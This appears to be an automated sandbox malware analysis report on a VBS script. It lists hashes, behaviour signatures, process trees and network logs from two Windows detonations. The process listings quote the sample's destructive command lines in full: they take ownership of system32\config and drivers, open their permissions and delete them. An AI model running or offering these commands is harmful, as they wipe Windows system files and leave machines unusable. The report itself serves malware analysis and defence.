Malware Analysis Report

2024-11-16 12:53

Sample ID 240815-1chybazemk
Target script.vbs
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
Tags: discovery, exploit
Score: 8/10

Analysis Overview

Score: 8/10

SHA256

92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

Threat Level: Likely malicious

The file script.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:30

Reported

2024-08-15 21:33

Platform

win7-20240708-en

Max time kernel

119s

Max time network

126s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2372 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2372 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2372 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 320 wrote to memory of 2824 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2824 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2824 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2824 wrote to memory of 2636 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2636 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2636 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2316 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2824 wrote to memory of 2316 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2824 wrote to memory of 2316 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 cef6ac1c7b72212cb9b26421ba748362
SHA1 05858a591fc90a1af835454aee11b7d893649517
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

C:\Users\Admin\Desktop\DebugPublish.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:30

Reported

2024-08-15 21:33

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

157s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 cef6ac1c7b72212cb9b26421ba748362
SHA1 05858a591fc90a1af835454aee11b7d893649517
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c